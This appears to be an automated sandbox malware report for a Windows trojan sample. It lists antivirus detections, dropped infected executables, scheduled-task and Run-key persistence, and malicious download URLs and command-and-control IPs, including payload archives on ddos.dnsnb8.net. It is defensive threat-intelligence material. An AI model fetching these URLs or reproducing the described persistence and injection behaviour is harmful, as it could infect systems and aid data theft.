            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1481168 Sample: Lisect_AVT_24003_G1A_89.exe Startdate: 25/07/2024 Architecture: WINDOWS Score: 100 55 ddos.dnsnb8.net 2->55 61 Multi AV Scanner detection for domain / URL 2->61 63 Antivirus detection for URL or domain 2->63 65 Antivirus detection for dropped file 2->65 67 11 other signatures 2->67 9 Lisect_AVT_24003_G1A_89.exe 1 10 2->9         started        14 MPGPH131.exe 2 2->14         started        16 RageMP131.exe 2 2->16         started        18 MPGPH131.exe 2 2->18         started        signatures3 process4 dnsIp5 59 193.233.132.62, 49705, 49708, 49709 FREE-NET-ASFREEnetEU Russian Federation 9->59 47 C:\Users\user\AppData\Local\Temp\jHYZko.exe, PE32 9->47 dropped 49 C:\Users\user\AppData\Local\...\RageMP131.exe, PE32 9->49 dropped 51 C:\ProgramData\MPGPH131\MPGPH131.exe, PE32 9->51 dropped 53 2 other malicious files 9->53 dropped 77 Detected unpacking (changes PE section rights) 9->77 79 Contains functionality to check for running processes (XOR) 9->79 81 Contains functionality to inject threads in other processes 9->81 83 Uses schtasks.exe or at.exe to add and modify task schedules 9->83 20 jHYZko.exe 18 9->20         started        25 schtasks.exe 1 9->25         started        27 schtasks.exe 1 9->27         started        85 Antivirus detection for dropped file 14->85 87 Multi AV Scanner detection for dropped file 14->87 89 Machine Learning detection for dropped file 14->89 91 Found stalling execution ending in API Sleep call 14->91 93 Hides threads from debuggers 16->93 29 jHYZko.exe 27 16->29         started        file6 signatures7 process8 dnsIp9 57 ddos.dnsnb8.net 44.221.84.105, 49704, 49706, 49707 AMAZON-AESUS United States 20->57 41 C:\Program Files\7-Zip\Uninstall.exe, PE32 20->41 dropped 43 C:\Program Files (x86)\AutoIt3\...\SciTE.exe, PE32 20->43 dropped 45 C:\Program Files (x86)\AutoIt3\...\MyProg.exe, MS-DOS 20->45 dropped 69 Antivirus detection for dropped file 20->69 71 Multi AV Scanner detection for dropped file 20->71 73 Detected unpacking (changes PE section rights) 20->73 75 2 other signatures 20->75 31 WerFault.exe 19 16 20->31         started        33 conhost.exe 25->33         started        35 conhost.exe 27->35         started        37 cmd.exe 29->37         started        file10 signatures11 process12 process13 39 conhost.exe 37->39         started       

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Lisect_AVT_24003_G1A_89.exe95%ReversingLabsWin32.Virus.Jadtre
            Lisect_AVT_24003_G1A_89.exe86%VirustotalBrowse
            Lisect_AVT_24003_G1A_89.exe100%AviraW32/Jadtre.B
            Lisect_AVT_24003_G1A_89.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\RageMP131\RageMP131.exe100%AviraW32/Jadtre.B
            C:\Users\user\AppData\Local\Temp\jHYZko.exe100%AviraTR/Dldr.Small.Z.haljq
            C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
            C:\ProgramData\MPGPH131\MPGPH131.exe100%AviraW32/Jadtre.B
            C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
            C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
            C:\Users\user\AppData\Local\RageMP131\RageMP131.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\jHYZko.exe100%Joe Sandbox ML
            C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
            C:\ProgramData\MPGPH131\MPGPH131.exe100%Joe Sandbox ML
            C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
            C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
            C:\ProgramData\MPGPH131\MPGPH131.exe95%ReversingLabsWin32.Virus.Jadtre
            C:\ProgramData\MPGPH131\MPGPH131.exe86%VirustotalBrowse
            C:\Users\user\AppData\Local\RageMP131\RageMP131.exe95%ReversingLabsWin32.Virus.Jadtre
            C:\Users\user\AppData\Local\RageMP131\RageMP131.exe86%VirustotalBrowse
            C:\Users\user\AppData\Local\Temp\jHYZko.exe92%ReversingLabsWin32.Trojan.Madeba
            C:\Users\user\AppData\Local\Temp\jHYZko.exe90%VirustotalBrowse
            No Antivirus matches
            SourceDetectionScannerLabelLink
            ddos.dnsnb8.net13%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://www.scintilla.org/scite.rng0%URL Reputationsafe
            http://www.rftp.comJosiah0%URL Reputationsafe
            http://www.rftp.comJosiah0%URL Reputationsafe
            http://www.activestate.com0%URL Reputationsafe
            http://www.activestate.comHolger0%URL Reputationsafe
            http://ddos.dnsnb8.net:799/cj//k3.rar100%URL Reputationmalware
            http://ddos.dnsnb8.net:799/cj//k3.rar100%URL Reputationmalware
            http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl070%URL Reputationsafe
            http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl070%URL Reputationsafe
            http://upx.sf.net0%URL Reputationsafe
            http://www.rftp.com0%URL Reputationsafe
            http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr0%URL Reputationsafe
            http://ddos.dnsnb8.net:799/cj//k2.rar100%URL Reputationmalware
            http://www.baanboard.comBrendon0%URL Reputationsafe
            https://www.smartsharesystems.com/0%URL Reputationsafe
            http://www.scintilla.org0%URL Reputationsafe
            http://www.spaceblue.comMathias0%URL Reputationsafe
            https://www.smartsharesystems.com/Morten0%URL Reputationsafe
            http://www.develop.com0%URL Reputationsafe
            http://pki-ocsp.symauth.com00%URL Reputationsafe
            http://www.lua.org0%URL Reputationsafe
            http://ddos.dnsnb8.net/100%URL Reputationmalware
            http://ddos.dnsnb8.net:799/cj//k1.rar100%URL Reputationmalware
            http://www.spaceblue.com0%URL Reputationsafe
            http://www.winimage.com/zLibDll0%URL Reputationsafe
            http://www.baanboard.com0%URL Reputationsafe
            http://www.develop.comDeepak0%URL Reputationsafe
            http://ddos.dnsnb8.net:799/cj//k1.rarky.tth.txtp100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net:799/cj//k2.rarZ100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net/=100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net:799/cj//k2.rar=x100%Avira URL Cloudmalware
            http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE0%Avira URL Cloudsafe
            http://ddos.dnsnb8.net:799/cj//k1.rar=x100%Avira URL Cloudphishing
            https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll0%Avira URL Cloudsafe
            http://ddos.dnsnb8.net:799/cj//k2.rarZ12%VirustotalBrowse
            http://ddos.dnsnb8.net:799/cj//k2.rar=x12%VirustotalBrowse
            https://t.me/RiseProSUPPORT0%Avira URL Cloudsafe
            http://ddos.dnsnb8.net/=14%VirustotalBrowse
            http://ddos.dnsnb8.net:799/cj//k4.rar(y100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net:799/cj//k2.rarl100%Avira URL Cloudmalware
            https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll0%VirustotalBrowse
            https://t.me/RiseProSUPPORT0%VirustotalBrowse
            http://ddos.dnsnb8.net:799/cj//k4.rarC:100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k3.rarL100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k3.rarO100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net:799/cj//k5.rar100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k2.rarl11%VirustotalBrowse
            http://ddos.dnsnb8.net:799/cj//k3.rarR100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k1.rartC:100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k4.rarC:12%VirustotalBrowse
            http://ddos.dnsnb8.net:799/cj//k5.rar13%VirustotalBrowse
            http://ddos.dnsnb8.net:799/cj//k3.rarO16%VirustotalBrowse
            http://ddos.dnsnb8.net:799/cj//k5.rarsC:100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k3.rarL9%VirustotalBrowse
            http://ddos.dnsnb8.net:799/cj//k1.rarExh100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net:799/cj//k4.rar100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k1.rarm100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net:799/cj//k3.rarR17%VirustotalBrowse
            http://ddos.dnsnb8.net:799/cj//k5.rarHxg100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k3.rarpy_100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k1.rartC:12%VirustotalBrowse
            http://ddos.dnsnb8.net:799/cj//k4.rar13%VirustotalBrowse
            http://ddos.dnsnb8.net:799/cj//k5.rarsC:16%VirustotalBrowse
            http://ddos.dnsnb8.net:799/cj//k2.rarfC:100%Avira URL Cloudmalware
            https://t.me/RiseProSUPPORTz0%Avira URL Cloudsafe
            http://ddos.dnsnb8.net:799/cj//k1.rarm16%VirustotalBrowse
            http://ddos.dnsnb8.net:799/cj//k2.rarfC:10%VirustotalBrowse
            https://t.me/RiseProSUPPORTz1%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            ddos.dnsnb8.net
            44.221.84.105
            truefalseunknown
            NameMaliciousAntivirus DetectionReputation
            http://ddos.dnsnb8.net:799/cj//k3.rartrue
            • URL Reputation: malware
            • URL Reputation: malware
            unknown
            http://ddos.dnsnb8.net:799/cj//k2.rartrue
            • URL Reputation: malware
            unknown
            http://ddos.dnsnb8.net:799/cj//k5.rartrue
            • 13%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            http://ddos.dnsnb8.net:799/cj//k1.rartrue
            • URL Reputation: malware
            unknown
            http://ddos.dnsnb8.net:799/cj//k4.rartrue
            • 13%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://ddos.dnsnb8.net:799/cj//k1.rarky.tth.txtpjHYZko.exe, 00000010.00000003.2369312075.0000000000C58000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: phishing
            unknown
            http://ddos.dnsnb8.net:799/cj//k2.rarZjHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmptrue
            • 12%, Virustotal, Browse
            • Avira URL Cloud: phishing
            unknown
            http://www.scintilla.org/scite.rngSciTE.exe.1.drfalse
            • URL Reputation: safe
            unknown
            http://www.rftp.comJosiahSciTE.exe.1.drfalse
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://ddos.dnsnb8.net:799/cj//k2.rar=xjHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmptrue
            • 12%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            http://ddos.dnsnb8.net/=jHYZko.exe, 00000001.00000003.2022506492.00000000012C7000.00000004.00000020.00020000.00000000.sdmptrue
            • 14%, Virustotal, Browse
            • Avira URL Cloud: phishing
            unknown
            http://www.activestate.comSciTE.exe.1.drfalse
            • URL Reputation: safe
            unknown
            http://www.activestate.comHolgerSciTE.exe.1.drfalse
            • URL Reputation: safe
            unknown
            http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07Lisect_AVT_24003_G1A_89.exe, RageMP131.exe.0.dr, MPGPH131.exe.0.drfalse
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DEjHYZko.exe, 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmp, jHYZko.exe, 00000001.00000003.2014334444.0000000001240000.00000004.00001000.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2362229934.0000000000AE0000.00000004.00001000.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000002.2542328869.00000000001E3000.00000002.00000001.01000000.00000004.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dllLisect_AVT_24003_G1A_89.exe, 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457547906.00000000008C1000.00000040.00000001.01000000.0000000A.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://ddos.dnsnb8.net:799/cj//k1.rar=xjHYZko.exe, 00000010.00000003.2369326263.0000000000CB3000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: phishing
            unknown
            http://upx.sf.netAmcache.hve.1.drfalse
            • URL Reputation: safe
            unknown
            http://www.rftp.comSciTE.exe.1.drfalse
            • URL Reputation: safe
            unknown
            https://t.me/RiseProSUPPORTLisect_AVT_24003_G1A_89.exe, 00000000.00000002.4459917823.00000000021A7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.4459389526.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000008.00000002.4459782824.0000000001667000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.4459264135.0000000001AAE000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.crLisect_AVT_24003_G1A_89.exe, RageMP131.exe.0.dr, MPGPH131.exe.0.drfalse
            • URL Reputation: safe
            unknown
            http://ddos.dnsnb8.net:799/cj//k4.rar(yjHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: phishing
            unknown
            http://www.baanboard.comBrendonSciTE.exe.1.drfalse
            • URL Reputation: safe
            unknown
            https://www.smartsharesystems.com/SciTE.exe.1.drfalse
            • URL Reputation: safe
            unknown
            http://ddos.dnsnb8.net:799/cj//k2.rarljHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmptrue
            • 11%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            http://ddos.dnsnb8.net:799/cj//k4.rarC:jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmptrue
            • 12%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            http://www.scintilla.orgSciTE.exe.1.drfalse
            • URL Reputation: safe
            unknown
            http://www.spaceblue.comMathiasSciTE.exe.1.drfalse
            • URL Reputation: safe
            unknown
            https://www.smartsharesystems.com/MortenSciTE.exe.1.drfalse
            • URL Reputation: safe
            unknown
            http://ddos.dnsnb8.net:799/cj//k3.rarLjHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmptrue
            • 9%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            http://ddos.dnsnb8.net:799/cj//k3.rarOjHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmptrue
            • 16%, Virustotal, Browse
            • Avira URL Cloud: phishing
            unknown
            http://ddos.dnsnb8.net:799/cj//k3.rarRjHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmptrue
            • 17%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            http://www.develop.comSciTE.exe.1.drfalse
            • URL Reputation: safe
            unknown
            http://pki-ocsp.symauth.com0Lisect_AVT_24003_G1A_89.exe, RageMP131.exe.0.dr, MPGPH131.exe.0.drfalse
            • URL Reputation: safe
            unknown
            http://www.lua.orgSciTE.exe.1.drfalse
            • URL Reputation: safe
            unknown
            http://ddos.dnsnb8.net:799/cj//k1.rartC:jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2369326263.0000000000CB3000.00000004.00000020.00020000.00000000.sdmptrue
            • 12%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            http://ddos.dnsnb8.net/jHYZko.exe, 00000010.00000003.2369419269.0000000000C65000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000002.2542768504.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2369186739.0000000000C5F000.00000004.00000020.00020000.00000000.sdmptrue
            • URL Reputation: malware
            unknown
            http://ddos.dnsnb8.net:799/cj//k5.rarsC:jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmptrue
            • 16%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            http://www.spaceblue.comSciTE.exe.1.drfalse
            • URL Reputation: safe
            unknown
            http://ddos.dnsnb8.net:799/cj//k1.rarExhjHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2369326263.0000000000CB3000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: phishing
            unknown
            http://www.winimage.com/zLibDllLisect_AVT_24003_G1A_89.exe, 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457547906.00000000008C1000.00000040.00000001.01000000.0000000A.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.baanboard.comSciTE.exe.1.drfalse
            • URL Reputation: safe
            unknown
            http://ddos.dnsnb8.net:799/cj//k1.rarmjHYZko.exe, 00000001.00000003.2022506492.00000000012D9000.00000004.00000020.00020000.00000000.sdmptrue
            • 16%, Virustotal, Browse
            • Avira URL Cloud: phishing
            unknown
            http://ddos.dnsnb8.net:799/cj//k5.rarHxgjHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            unknown
            http://ddos.dnsnb8.net:799/cj//k3.rarpy_jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            unknown
            http://www.develop.comDeepakSciTE.exe.1.drfalse
            • URL Reputation: safe
            unknown
            http://ddos.dnsnb8.net:799/cj//k2.rarfC:jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmptrue
            • 10%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            https://t.me/RiseProSUPPORTzMPGPH131.exe, 00000007.00000002.4459389526.00000000013AD000.00000004.00000020.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            44.221.84.105
            ddos.dnsnb8.netUnited States
            14618AMAZON-AESUSfalse
            193.233.132.62
            unknownRussian Federation
            2895FREE-NET-ASFREEnetEUfalse
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1481168
            Start date and time:2024-07-25 05:09:06 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 10m 46s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:20
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:Lisect_AVT_24003_G1A_89.exe
            Detection:MAL
            Classification:mal100.spre.troj.evad.winEXE@27/31@1/2
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:Failed
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Override analysis time to 240s for sample files taking high CPU consumption
            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 52.182.143.212
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report creation exceeded maximum time and may have missing disassembly code information.
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtOpenFile calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            TimeTypeDescription
            05:09:57Task SchedulerRun new task: MPGPH131 HR path: C:\ProgramData\MPGPH131\MPGPH131.exe
            05:09:58Task SchedulerRun new task: MPGPH131 LG path: C:\ProgramData\MPGPH131\MPGPH131.exe
            05:09:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
            05:10:20AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
            23:10:22API Interceptor1x Sleep call for process: WerFault.exe modified
            23:10:26API Interceptor3353362x Sleep call for process: Lisect_AVT_24003_G1A_89.exe modified
            23:10:31API Interceptor90273x Sleep call for process: MPGPH131.exe modified
            23:11:01API Interceptor1908979x Sleep call for process: RageMP131.exe modified
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            44.221.84.105Lisect_AVT_24003_G1A_84.exeGet hashmaliciousBdaejecBrowse
            • ddos.dnsnb8.net:799/cj//k1.rar
            Lisect_AVT_24003_G1A_90.exeGet hashmaliciousBdaejecBrowse
            • ddos.dnsnb8.net:799/cj//k2.rar
            Lisect_AVT_24003_G1A_35.exeGet hashmaliciousBdaejecBrowse
            • ddos.dnsnb8.net:799/cj//k2.rar
            Lisect_AVT_24003_G1A_54.exeGet hashmaliciousBdaejecBrowse
            • ddos.dnsnb8.net:799/cj//k2.rar
            Lisect_AVT_24003_G1A_55.exeGet hashmaliciousAzorult, BdaejecBrowse
            • ddos.dnsnb8.net:799/cj//k2.rar
            Lisect_AVT_24003_G1A_37.exeGet hashmaliciousBdaejec, RisePro StealerBrowse
            • ddos.dnsnb8.net:799/cj//k5.rar
            Lisect_AVT_24003_G1A_79.exeGet hashmaliciousAmadey, BdaejecBrowse
            • ddos.dnsnb8.net:799/cj//k3.rar
            Lisect_AVT_24003_G1A_70.exeGet hashmaliciousLummaC, Bdaejec, LummaC StealerBrowse
            • ddos.dnsnb8.net:799/cj//k3.rar
            Lisect_AVT_24003_G1A_72.exeGet hashmaliciousLummaC, Bdaejec, LummaC StealerBrowse
            • ddos.dnsnb8.net:799/cj//k2.rar
            Lisect_AVT_24003_G1A_5.exeGet hashmaliciousQuasar, BdaejecBrowse
            • ddos.dnsnb8.net:799/cj//k1.rar
            193.233.132.62SecuriteInfo.com.Win32.PWSX-gen.14899.4987.exeGet hashmaliciousAmadey, RisePro StealerBrowse
            • 193.233.132.62:57893/hera/amadka.exe
            SecuriteInfo.com.Win32.PWSX-gen.580.27252.exeGet hashmaliciousAmadey, RisePro StealerBrowse
            • 193.233.132.62:57893/hera/amadka.exe
            SecuriteInfo.com.Win32.PWSX-gen.15960.19323.exeGet hashmaliciousAmadey, RisePro StealerBrowse
            • 193.233.132.62:57893/hera/amadka.exe
            9iz0QM9rMM.exeGet hashmaliciousAmadey, RisePro StealerBrowse
            • 193.233.132.62:57893/hera/amadka.exe
            4fMLTRkOfB.exeGet hashmaliciousAmadey, RisePro StealerBrowse
            • 193.233.132.62:57893/hera/amadka.exe
            q7a5JOlhLZ.exeGet hashmaliciousAmadey, RisePro StealerBrowse
            • 193.233.132.62:57893/hera/amadka.exe
            7jv1U7CgKF.exeGet hashmaliciousAmadey, RisePro StealerBrowse
            • 193.233.132.62:57893/hera/amadka.exe
            file.exeGet hashmaliciousAmadey, RisePro StealerBrowse
            • 193.233.132.62:57893/hera/amadka.exe
            SecuriteInfo.com.Win32.PWSX-gen.10022.32492.exeGet hashmaliciousAmadey, RisePro StealerBrowse
            • 193.233.132.62:57893/hera/amadka.exe
            file.exeGet hashmaliciousAmadey, RisePro StealerBrowse
            • 193.233.132.62:57893/hera/amadka.exe
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            ddos.dnsnb8.netLisect_AVT_24003_G1A_84.exeGet hashmaliciousBdaejecBrowse
            • 44.221.84.105
            Lisect_AVT_24003_G1A_90.exeGet hashmaliciousBdaejecBrowse
            • 44.221.84.105
            Lisect_AVT_24003_G1A_35.exeGet hashmaliciousBdaejecBrowse
            • 44.221.84.105
            Lisect_AVT_24003_G1A_54.exeGet hashmaliciousBdaejecBrowse
            • 44.221.84.105
            Lisect_AVT_24003_G1A_55.exeGet hashmaliciousAzorult, BdaejecBrowse
            • 44.221.84.105
            Lisect_AVT_24003_G1A_37.exeGet hashmaliciousBdaejec, RisePro StealerBrowse
            • 44.221.84.105
            Lisect_AVT_24003_G1A_79.exeGet hashmaliciousAmadey, BdaejecBrowse
            • 44.221.84.105
            Lisect_AVT_24003_G1A_70.exeGet hashmaliciousLummaC, Bdaejec, LummaC StealerBrowse
            • 44.221.84.105
            Lisect_AVT_24003_G1A_72.exeGet hashmaliciousLummaC, Bdaejec, LummaC StealerBrowse
            • 44.221.84.105
            Lisect_AVT_24003_G1A_5.exeGet hashmaliciousQuasar, BdaejecBrowse
            • 44.221.84.105
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            AMAZON-AESUSLisect_AVT_24003_G1A_84.exeGet hashmaliciousBdaejecBrowse
            • 44.221.84.105
            Lisect_AVT_24003_G1A_90.exeGet hashmaliciousBdaejecBrowse
            • 44.221.84.105
            Lisect_AVT_24003_G1A_35.exeGet hashmaliciousBdaejecBrowse
            • 44.221.84.105
            Lisect_AVT_24003_G1A_54.exeGet hashmaliciousBdaejecBrowse
            • 44.221.84.105
            Lisect_AVT_24003_G1A_55.exeGet hashmaliciousAzorult, BdaejecBrowse
            • 44.221.84.105
            Lisect_AVT_24003_G1A_37.exeGet hashmaliciousBdaejec, RisePro StealerBrowse
            • 44.221.84.105
            Lisect_AVT_24003_G1A_79.exeGet hashmaliciousAmadey, BdaejecBrowse
            • 44.221.84.105
            Lisect_AVT_24003_G1A_70.exeGet hashmaliciousLummaC, Bdaejec, LummaC StealerBrowse
            • 44.221.84.105
            Lisect_AVT_24003_G1A_72.exeGet hashmaliciousLummaC, Bdaejec, LummaC StealerBrowse
            • 44.221.84.105
            Lisect_AVT_24003_G1A_5.exeGet hashmaliciousQuasar, BdaejecBrowse
            • 44.221.84.105
            FREE-NET-ASFREEnetEULisect_AVT_24003_G1A_37.exeGet hashmaliciousBdaejec, RisePro StealerBrowse
            • 193.233.132.62
            LisectAVT_2403002A_262.exeGet hashmaliciousRisePro StealerBrowse
            • 193.233.132.190
            LisectAVT_2403002A_224.exeGet hashmaliciousRisePro StealerBrowse
            • 193.233.132.74
            hunta[1].exeGet hashmaliciousBdaejec, RisePro StealerBrowse
            • 193.233.132.62
            External Own 4.20.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
            • 147.45.47.64
            Aquantia_Setup 2.11.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
            • 147.45.47.64
            AdobeUpdaterV131.exeGet hashmaliciousBdaejec, RisePro StealerBrowse
            • 193.233.132.62
            installer.exeGet hashmaliciousLummaC, PureLog Stealer, Xmrig, zgRATBrowse
            • 147.45.47.81
            92.249.48.47-skid.arm7-2024-07-20T09_04_19.elfGet hashmaliciousMirai, MoobotBrowse
            • 147.45.93.156
            conhost.exeGet hashmaliciousXmrigBrowse
            • 147.45.47.81
            No context
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            C:\Users\user\AppData\Local\Temp\jHYZko.exeLisect_AVT_24003_G1A_84.exeGet hashmaliciousBdaejecBrowse
              Lisect_AVT_24003_G1A_90.exeGet hashmaliciousBdaejecBrowse
                Lisect_AVT_24003_G1A_35.exeGet hashmaliciousBdaejecBrowse
                  Lisect_AVT_24003_G1A_54.exeGet hashmaliciousBdaejecBrowse
                    Lisect_AVT_24003_G1A_55.exeGet hashmaliciousAzorult, BdaejecBrowse
                      Lisect_AVT_24003_G1A_37.exeGet hashmaliciousBdaejec, RisePro StealerBrowse
                        Lisect_AVT_24003_G1A_79.exeGet hashmaliciousAmadey, BdaejecBrowse
                          Lisect_AVT_24003_G1A_70.exeGet hashmaliciousLummaC, Bdaejec, LummaC StealerBrowse
